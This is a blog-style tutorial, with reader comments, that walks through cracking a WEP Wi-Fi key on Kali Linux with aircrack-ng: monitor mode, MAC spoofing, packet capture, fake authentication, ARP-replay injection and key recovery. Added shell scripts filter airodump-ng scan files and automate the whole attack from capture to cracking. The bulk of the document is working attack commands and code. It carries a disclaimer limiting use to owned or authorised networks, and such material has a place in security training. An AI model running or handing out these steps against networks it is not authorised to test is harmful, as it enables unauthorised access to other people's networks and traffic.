How to Crack WEP WIFI Passwords using Kali Linux 2017

Cracking a WEP key is child's play, and the Internet is full of tutorials for it. So why am I writing this? This post is introductory material for my next article, where I explain what really happens inside WEP and how each step below actually recovers the key.

As far as this post goes, it is just another post on the Internet that walks you through cracking a WEP password.

This is purely for educational purposes; only run it against a network you own or are authorised to test. I am not responsible for your actions. Keeping that in mind, let's start.

The aircrack-ng tools only work with Wi-Fi adapters whose chipset and driver support monitor mode and packet injection. Assuming you know whether yours does, we will move forward; if not, look it up before you read any further. Here is a link which might help you

Setting our Adapter in Monitor Mode

Open a terminal, type the following command and hit enter, as shown in the figure below.

airmon-ng 

This lists our Wi-Fi adapters together with their chipset and driver. I am using a USB adapter because my Dell's built-in adapter doesn't support monitor mode.

The word highlighted in the picture is our adapter's interface name. We need to put this interface into monitor mode so that it captures every frame on the channel, not only the ones addressed to us (what is monitor mode? Explanation in the next article).

airmon-ng start wlan0 ( airmon-ng start <interfaceName> )

Notice that our interface wlan0 is now in monitor mode under the new name wlan0mon (see the second-to-last line of the output). airmon-ng also warns about a few processes, NetworkManager and wpa_supplicant among them, that could interfere with the card, and prints their PIDs. We could kill each one individually, but there is a single command that kills them all at once (it is normally run before airmon-ng start, but it works here as well):

airmon-ng check kill

Changing MAC Address ( optional, but safety first )

Type the commands below one by one. macchanger prints the new address; note it down, because it is how you will recognise your own adapter in the STATION list later.

ifconfig wlan0mon down ( the interface must be down before its MAC can be changed )
macchanger -a wlan0mon ( picks a random MAC with a real vendor prefix of the same kind; -r would pick a fully random one )
ifconfig wlan0mon up ( bring it back up )

Searching for Access Points around you

Type the following command to scan for all Wi-Fi access points in range

airodump-ng wlan0mon ( airodump-ng <Interface in monitor mode> )

After hitting enter you will see a list of all access points around you, one per line, with their BSSID, channel (CH), encryption (ENC) and network name (ESSID). Press CTRL+C once your target shows up.

Here let's select the access point that uses WEP encryption; as you see above there is only one, and that is loadme! ( Note ENC for encryption and ESSID for the name. Note down its BSSID and CH as well, the next command needs both. )
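Picking the target by eye works for one network, but airodump-ng also writes its scan table to a CSV when given -w <prefix>, and that file is easier to filter. The script below is an added example, not part of the original article: it pulls every WEP network (BSSID, channel, ESSID) out of that CSV and counts the stations associated with a given BSSID, which tells you up front whether anyone is generating traffic. The CSV layout is airodump-ng's own; the sample rows, BSSIDs and names are constructed for the demonstration.

```shell
#!/bin/sh
# Added example (not from the article): filter an airodump-ng scan CSV.
# airodump-ng -w <prefix> writes <prefix>-01.csv next to the .cap file:
# an access-point table, a blank line, then a station table.

# Constructed sample in airodump-ng's CSV layout; addresses and names are made up.
SAMPLE_CSV='
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:55, 2017-05-01 10:00:00, 2017-05-01 10:05:00, 11, 54, WEP, WEP, , -40, 120, 0, 0. 0. 0. 0, 6, loadme, 
66:77:88:99:AA:BB, 2017-05-01 10:00:00, 2017-05-01 10:05:00, 6, 54, WPA2, CCMP, PSK, -60, 90, 0, 0. 0. 0. 0, 7, homenet, 
CC:DD:EE:FF:00:11, 2017-05-01 10:00:01, 2017-05-01 10:05:00, 1, 54, OPN, , , -70, 30, 0, 0. 0. 0. 0, 5, guest, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
AA:BB:CC:DD:EE:FF, 2017-05-01 10:00:00, 2017-05-01 10:05:00, -50, 200, 00:11:22:33:44:55, 
12:34:56:78:9A:BC, 2017-05-01 10:01:00, 2017-05-01 10:05:00, -65, 10, (not associated), 
'

# Print "BSSID channel ESSID" for every access point whose Privacy column
# (field 6) is WEP. Reads the CSV on stdin; the "BSSID" header starts the
# AP table and the "Station MAC" header ends it. Strips CRLF line endings,
# which airodump-ng uses in its CSV output.
wep_targets() {
    awk -F', *' '
        { sub(/\r$/, "") }
        /^BSSID/       { in_ap = 1; next }
        /^Station MAC/ { in_ap = 0 }
        in_ap && $6 ~ /^WEP *$/ { print $1, $4, $14 }
    '
}

# Count stations associated with one BSSID (station table, field 6).
# Unassociated clients show "(not associated)" there and are not counted.
# A WEP network with zero clients will not yield data frames on its own.
client_count() {
    awk -F', *' -v b="$1" '
        { sub(/\r$/, "") }
        /^Station MAC/ { in_sta = 1; next }
        in_sta && $6 == b { n++ }
        END { print n + 0 }
    '
}

# Usage against a real scan: run airodump-ng -w scan wlan0mon for a while,
# then:  wep_targets < scan-01.csv ; client_count <bssid> < scan-01.csv
printf '%s\n' "$SAMPLE_CSV" | wep_targets
printf '%s\n' "$SAMPLE_CSV" | client_count 00:11:22:33:44:55
```

On the constructed sample this prints the single WEP network, loadme on channel 11, and one associated client for it; a zero from client_count is your cue that the fake-authentication step below will be doing all the work.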

Capturing Packets of selected access point

Now let's capture packets from the Wi-Fi network we want to crack. Type the following command to do so.

airodump-ng --bssid 00:xx:xx:xx:xx:xx -w loadme -c 11 wlan0mon

airodump-ng --bssid <mac address of router> -w <file name prefix to store packets> -c <channel num> <interface in monitor mode> ( you found all these details in the scan above; the capture lands in loadme-01.cap in the current directory, with a loadme-01.csv beside it ).

After you run the command you will see something like this on your screen.

Now let's understand this. The first block shows details about the router. The second block shows the router and the devices connected to it: the STATION column lists the MAC addresses of the connected clients. I highlighted the Data column. This is the most important number: it counts the captured data frames, and every WEP data frame carries a 24-bit IV that aircrack-ng needs. The attack wants a large number of distinct IVs, so this column tells us whether we have enough traffic yet. The stations send those frames and we capture them. If no device is connected, nothing generates traffic and cracking is difficult.

Even when devices are connected you sometimes won't get data packets quickly and might have to wait a while. Here we will not wait; instead we will force the router to send packets.

Forcing to send Data packets using Fake Auth

Open a new terminal and type the following command to associate with the router using fake authentication.

aireplay-ng -1 0 -a 00:xx:xx:xx:xx:xx wlan0mon ( -1 0 = fake authentication with no re-association delay, -a <mac address of router>, then <interface in monitor mode> )

This means your adapter is now associated with the router ( it does not mean you can use the network without the password; you are still not connected ). The router only accepts the replayed frames of the next step from an associated client, so look for "Association successful :-)" in the output before moving on. You can see the MAC address of your adapter, and the remaining text explains the rest.

Go to the terminal that is capturing data. In the last part of the screen, under the STATION column, you can now see the MAC address of your own Wi-Fi adapter. Don't stop the process, let it continue.

Get packets from the target router

This is the main phase. This is what boosts the data packet count, and the terminal that is still running the capture picks those packets up.

Type the following command

aireplay-ng -3 -b 00:xx:xx:xx:xx:xx wlan0mon ( -3 = ARP request replay, -b <mac address of router> )

Read the text in the terminal and you will understand the process: aireplay-ng waits until it sees an ARP request from a client, then replays that same frame to the router over and over. Each replay makes the router answer with a newly encrypted frame carrying a fresh IV. Once this starts, go back to the terminal that captures data and watch the Data column; it climbs by hundreds of packets per second. If it does not move, the fake authentication was probably not accepted, or no client has sent an ARP request yet.

Generally the packet count should be greater than 10000 before we try to crack; a 104-bit (so-called 128-bit) key usually needs several times that, and aircrack-ng simply reports failure and can be run again. Let's try. Open a new terminal. Remember that we were capturing data packets to a file? Let's see what files it generated; we named our file "loadme".

Open a new terminal and type

ls

Cracking the Password using aircrack-ng

Type the following in a new terminal

aircrack-ng loadme-01.cap ( aircrack-ng <capture file>; airodump-ng appended -01 to the prefix we gave it )

Notice that here it failed because we did not have enough IVs yet; aircrack-ng prints how many it tried with. Wait for more data and run the same command again.

There you go, that's the WEP key, shown as hex bytes separated by colons. To join the network, enter those hex digits without the colons as the WEP key ( aircrack-ng also prints the ASCII form when the key decodes to printable text ).

Final Steps

Hit CTRL+C in all the open terminals. Open a new terminal and type the following commands

airmon-ng stop wlan0mon ( stop monitor mode and return to normal; the interface goes back to being wlan0 )
service networking restart
service network-manager restart
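The whole procedure above is a fixed sequence with one manual loop in it: watch the Data column, try aircrack-ng, wait, try again. The script below is an added example, not from the original article, that drives the sequence from monitor mode through cleanup and replaces the manual loop by polling the "# IV" column of the loadme-01.csv file airodump-ng writes beside the .cap, running aircrack-ng only once the count passes a threshold. The interface, BSSID, channel and file prefix are assumed arguments; the monitor interface name (<iface>mon) and the -01 file suffix follow the naming seen in the article but vary between tool versions. The root-only part is gated behind WEP_ATTACK=1 so the parsing can be exercised without touching a card, on a constructed CSV row.

```shell
#!/bin/sh
# Added example (not from the article): drive capture, fake auth, ARP replay
# and cracking, polling airodump-ng's CSV instead of retrying by hand.
set -u

# The article's rule of thumb. 104-bit keys usually need several times more;
# aircrack-ng just fails and can be rerun, so the threshold only avoids
# pointless early attempts.
MIN_IVS=${MIN_IVS:-10000}

# Constructed capture CSV row (airodump-ng layout, made-up addresses) used
# to demonstrate iv_count without running any tool.
SAMPLE_CAPTURE_CSV='
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:11:22:33:44:55, 2017-05-01 10:05:00, 2017-05-01 10:12:30, 11, 54, WEP, WEP, , -40, 900, 12345, 0. 0. 0. 0, 6, loadme, 

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
AA:BB:CC:DD:EE:FF, 2017-05-01 10:05:10, 2017-05-01 10:12:30, -30, 24000, 00:11:22:33:44:55, 
'

# Print the "# IV" column (field 11 of the AP table) for one BSSID from an
# airodump-ng CSV on stdin; 0 if the BSSID is absent or the input is empty.
iv_count() {
    awk -F', *' -v b="$1" '
        { sub(/\r$/, "") }
        /^BSSID/       { in_ap = 1; next }
        /^Station MAC/ { in_ap = 0 }
        in_ap && $1 == b { n = $11 }
        END { print n + 0 }
    '
}

# True when the captured IV count has reached MIN_IVS.
enough_ivs() {
    [ "$1" -ge "$MIN_IVS" ]
}

# The real run: needs root, a monitor-capable adapter and a fresh prefix
# (an existing loadme-01.* would make airodump-ng write to -02 instead).
attack() {
    iface=$1 bssid=$2 chan=$3 prefix=$4
    airmon-ng check kill
    airmon-ng start "$iface"
    mon="${iface}mon"                        # assumed naming, as in the article
    airodump-ng --bssid "$bssid" -c "$chan" -w "$prefix" "$mon" >/dev/null 2>&1 &
    dump=$!
    sleep 5                                  # give the capture time to start
    aireplay-ng -1 0 -a "$bssid" "$mon"      # fake authentication, once
    aireplay-ng -3 -b "$bssid" "$mon" >/dev/null 2>&1 &
    replay=$!
    while :; do
        ivs=$(cat "${prefix}-01.csv" 2>/dev/null | iv_count "$bssid")
        echo "captured IVs: $ivs"
        enough_ivs "$ivs" && break
        sleep 10
    done
    kill "$replay" "$dump"
    aircrack-ng "${prefix}-01.cap"           # prints KEY FOUND! [ .. ] on success
    airmon-ng stop "$mon"
    service networking restart
    service network-manager restart
}

# Demonstration on the constructed row (safe to run anywhere).
printf '%s\n' "$SAMPLE_CAPTURE_CSV" | iv_count 00:11:22:33:44:55

# Real run only when explicitly asked for:
#   WEP_ATTACK=1 sh wep.sh wlan0 00:xx:xx:xx:xx:xx 11 loadme
if [ "${WEP_ATTACK:-0}" = 1 ]; then
    attack "${1:?interface}" "${2:?bssid}" "${3:?channel}" "${4:-loadme}"
fi
```

The CSV's "# IV" column is the same count the live screen shows under Data, so the poll watches exactly what the article tells you to watch; on the constructed row it reads 12345, which clears the default threshold.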

That's it. Have a nice day




Darwyn Young

Head of Information Technology and New product development

5y

How do I use that key to login?

Like
Reply
Antonella Tracchia

IT Technical Writer | Software Developer | API documentation

5y

Awesome, thank you

Like
Reply
shweta verma

System Administrator at NIELIT Gorakhpur

6y

very nice

Like
Reply
